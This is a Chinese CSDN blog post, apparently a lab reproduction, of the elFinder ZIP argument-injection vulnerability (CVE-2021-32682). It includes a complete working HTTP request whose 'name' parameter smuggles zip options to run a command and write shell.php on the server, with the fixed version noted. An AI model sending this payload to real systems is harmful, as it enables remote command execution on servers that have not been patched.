elFinder ZIP 参数注入导致命令注入 (CVE-2021-32682)

最新推荐文章于 2024-08-26 17:34:11 发布
最新推荐文章于 2024-08-26 17:34:11 发布
阅读量434 收藏 1
点赞数
文章标签: 网络安全 安全 web安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56537388/article/details/134660885
版权

漏洞描述

elFinder 是一个用于 Web 的开源文件管理器,使用 jQuery UI 用 JavaScript 编写。

在 elFinder 2.1.48 及更早版本中发现一个参数注入漏洞。此漏洞可能允许攻击者在托管 elFinder PHP 连接器的服务器上执行任意命令,即使配置最少也是如此。这些问题已在版本 2.1.59 中修补。解决方法是,确保连接器不会在未经身份验证的情况下公开。

引用:

漏洞环境及利用

搭建docker环境

访问8080端口

 

创建1.txt 

右键创建2.zip

然后,发送以下请求以执行任意命令:

GET /php/connector.minimal.php?cmd=archive&name=-TvTT=id>shell.php%20%23%20a.zip&target=l1_Lw&targets%5B1%5D=l1_Mi56aXA&targets%5B0%5D=l1_MS50eHQ&type=application%2Fzip HTTP/1.1
Host: your-ip
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://localhost.lan:8080/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close
 

在此请求中,您可以看到 3 个重要参数:

  • name,则其值等于 ,可以修改为任意命令-TvTT=id>shell.php # a.zipid>shell.php
  • targets[0],则其值等于 。 表示第一个存储卷,是 base64 编码的字符串l1_MS50eHQl1MS50eHQ1.txt
  • targets[1],则其值等于 。 表示第一个存储卷,是 base64 编码的字符串l1_Mi56aXAl1Mi56aXA2.zip

尽管此请求响应了错误消息,但我们的命令已执行并已写入:shell.phphttp://your-ip:8080/files/shell.php

 

blackK_YC
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WordPress插件File-Manager任意文件上传漏洞复现(CVE-2020-25213)
千寻的博客
01-26 1883
文章目录漏洞名称漏洞编号插件介绍漏洞描述影响版本实验环境及准备第一步 搭建wordpress第二步 下载插件,导入目录中第三步 查看漏洞点复现步骤第一步 安装模块 jq 模块第二步 检查漏洞是否存在第三步 访问上传的hello.php第四步 上传shell.php修复建议参考链接摘抄 漏洞名称 WordPress的插件 wp-file-manager 文件上传漏洞 漏洞编号 CVE-2020-25213 插件介绍 WP-file-manager是一个旨在帮助WordPress管理员管理其站点上的文
安全漏洞】CVE-2021-32682 elFinder RCE 简单分析
HBohan的博客
01-07 2778
elFinder 是一个开源的 web 文件管理器,使用 jQuery UI 用 Ja​​vaScript 编写。Creation 的灵感来自于 Mac OS X 操作系统中使用的 Finder 程序的简单性和便利性。
CVE-2021-32682 elFinder ZIP 参数与任意命令注入漏洞复现
ierciyuan的博客
08-02 2457
CVE-2021-32682 elFinder ZIP 参数与任意命令注入漏洞复现。源码包+追踪分析。
elfinder 命令注入 (CVE-2021-32682)
m0_65150886的博客
12-29 422
6.虽然这个数据包发送后会返回错误信息,但实际上其中指定的命令已经被成功执行,可以访问http://ip:port/files/shell.php查看执行的结果。该漏洞源于,在创建新的zip存档时,没有对name参数进行严格的过滤,导致参数被带入prox_open中执行,造成命令注入。3.右键这个文件,对其进行打包,打包后的文件命名为2.zip。4.对2.zip进行打包,命名为3.zip,同时进行抓包。2.创建一个普通的文本文件1.txt。及时更新到新版本2.1.49及以上。1.访问ip:port。
elfinder 命令注入 (CVE-2021-32682) 漏洞复现分析 | snort规则
weixin_68999845的博客
08-23 924
这个标志组合的意思是,在创建或更新 ZIP 归档时,会先添加文件到归档中,然后立即运行测试来验证归档的完整性,并且在执行过程中显示详细信息,\1. 复现过程:https://www.cnblogs.com/NoCirc1e/p/16275613.html。下载地址:https://github.com/Studio-42/elFinder,下载完成后,重命名。\2. 源码下载url:https://github.com/Studio-42/elFinder
[春秋云镜]CVE-2021-32682
niubi707的博客
12-05 4607
春秋云镜CVE-2021-32682elFinder 是一个开源的 web 文件管理器,使用 jQuery UI 用 Ja​vaScript 编写。Creation 的灵感来自于 Mac OS X 操作系统中使用的 Finder 程序的简单性和便利性。 其低版本中存在命令注入
elFinder-Material-Theme:elFinder的主题
02-03
elFinder-Material-Theme 是一个基于Material Design风格的皮肤,专为elFinder文件管理器设计。elFinder是一款开源的Web文件管理器,它允许用户在浏览器中管理服务器上的文件和目录,提供类似桌面操作系统的界面体验...
spring-elfinder-master.zip
04-06
在线预览和编辑功能需要依赖于elfinder的插件,如elfinder-file-editor用于编辑文本文件,elfinder-connector-image-viewer用于图片预览。这些插件通过与后端的交互,实现了对特定文件类型的处理。开发者需要确保...
elfinder-2.x-servlet:elfinder-2.x-servlet为elfinder-2.x连接器实现了Java servlet,elfinderWeb的开源文件管理器
05-13
什么是elfinder-2.x-servlet elfinder-2.x-servlet为elfinder-2.x连接器实现了Java servlet elfinder是用于Web的开源文件管理器,使用jQuery和jQuery UI用JavaScript编写。 另请参见 对于elfinder-1.2用户,请...
visual studio code怎么运行代码_elFinder远程代码执行漏洞(CVE20199194)分析复现 附:利用POC...
weixin_39673704的博客
11-26 386
关于elFinderelFilnder是一个开源的web的文件管理器,其界面和mac系统的finder差不多,用php开发,最近这个web app曝出了一个命令注入漏洞编号是CVE-2019-9194。现在将原有的2.1.47版本下载下来分析并复现一下这个漏洞。img环境搭建没有数据库,直接git上可以下载,我用的kail+php,同时,系统上还需要安装一个exiftran,用于图片转换...
【漏洞复现】CVE-2021-32682 elFinder ZIP 参数与任意命令注入
m0_53121608的博客
07-13 277
【漏洞复现】CVE-2021-32682 elFinder ZIP 参数与任意命令注入
Web 文件管理器elFinder 的漏洞链分析
HBohan的博客
09-16 863
应用程序与文件系统的交互始终是高度安全敏感的,因为较小的功能漏洞很容易成为可利用漏洞的来源。这种观察在web文件管理器的情况下尤其正确,其作用是复制完整文件系统的功能并以透明的方式将其公开给客户端的浏览器。 elFinder 是一种流行的 Web 文件管理器,常用于 CMS 和框架,例如 WordPress 插件 (wp-file-manager) 或 Symfony 包,以允许对本地和远程文件进行简单操作。在过去,elFinder一直是针对不安全配置或实际代码漏洞的活跃攻击的一部分。因此,elFinder
关于elfinder 插件再创建文件夹的时候向后台发两次请求
zhangMY12138的博客
09-27 318
elfinder.min.js 的 5840 行注释掉 就可以解决。 下方就是注释的内容 Ue.css("height", "auto"), e = Pe[0].clientHeight - parseInt(Pe.css("padding-top")) - parseInt(Pe.css("padding-bottom")) - parseInt(Ue.css("margin-to...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8418
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
如何使用双重IP代理实现更安全的网络访问
IPIPGO的博客
08-26 369
双重IP代理,顾名思义,就是在原有的代理IP基础上,再添加一层代理。这样,当你访问目标网站时,数据会先经过第一个代理服务器,再经过第二个代理服务器,最后到达目标网站。这种方式不仅能更好地保护你的隐私,还能有效防止IP被封禁。通过本文的介绍,相信你已经掌握了如何使用Java实现双重IP代理的方法。双重IP代理不仅能帮助我们更好地保护隐私,还能有效防止IP被封。在实际应用中,合理使用双重代理IP,将会使你的网络访问更加安全和高效。希望本文对你有所帮助,祝你在网络技术的道路上越走越远!t=N7T8。
网络安全教程初级简介
网络研究观
08-26 396
网络安全包括一系列技术、流程和实践,用于保护网络、设备、应用程序和数据免受攻击、盗窃或损坏等威胁。
【宝马中国-注册/登录安全分析报告】
08-26 900
宝马中国作为全世界最成功的汽车和摩托车制造商之一的宝马集团旗下公司, 其滑动验证码没有采用市场常用的几家, 有独特的地方, 背景图在被抠出后,并不是采用同行的常用的透明化保留原有图形样式,而是填充白色,所以滑块位置识别需要从背景图中提取, 这样让识别变得更简单,造成这中特点有两方面原因,1 直接填充白色背景的技术比透明度的方式更简单2 从报文看未获取轨迹数据, 显示验证方式中并未验证轨迹,只验证距离是否合适很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。
基于视觉识别引擎+深度学习实现安全保障数字化的智慧城管开源了
最新发布
weixin_63598920的博客
08-26 355
智慧城管视觉监控平台是一款功能强大且简单易用的实时算法视频监控系统。它的愿景是最底层打通各大芯片厂商相互间的壁垒,省去繁琐重复的适配流程,实现芯片、算法、应用的全流程组合,从而大大减少企业级应用约95%的开发成本。用户只需在界面上进行简单的操作,就可以实现全视频的接入及布控。
springboot-elfinder
09-21
springboot-elfinder是一个基于Spring Boot框架的开源文件管理器插件。它提供了一个易于集成和定制的文件管理解决方案。 springboot-elfinder支持常见的文件操作,如上传、下载、复制、移动、删除等。它还提供了文件夹导航、搜索、预览和回收站等功能,方便用户管理文件。 使用springboot-elfinder,我们可以轻松地集成文件管理功能到我们的Spring Boot应用程序中。我们只需要配置一些简单的参数,就可以让用户通过Web界面访问和管理文件。 此外,springboot-elfinder还支持自定义文件上传和下载的规则。我们可以根据具体的需求,配置允许的文件类型、最大文件大小等限制。 另外,springboot-elfinder还提供了丰富的插件和扩展机制。我们可以通过添加插件来扩展文件管理器的功能,例如增加图片缩略图、音频播放器等。 总之,springboot-elfinder是一个功能强大且易于使用的文件管理器插件。它提供了丰富的功能和灵活的扩展机制,可以方便地集成到我们的Spring Boot应用程序中,提供文件管理和操作的功能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值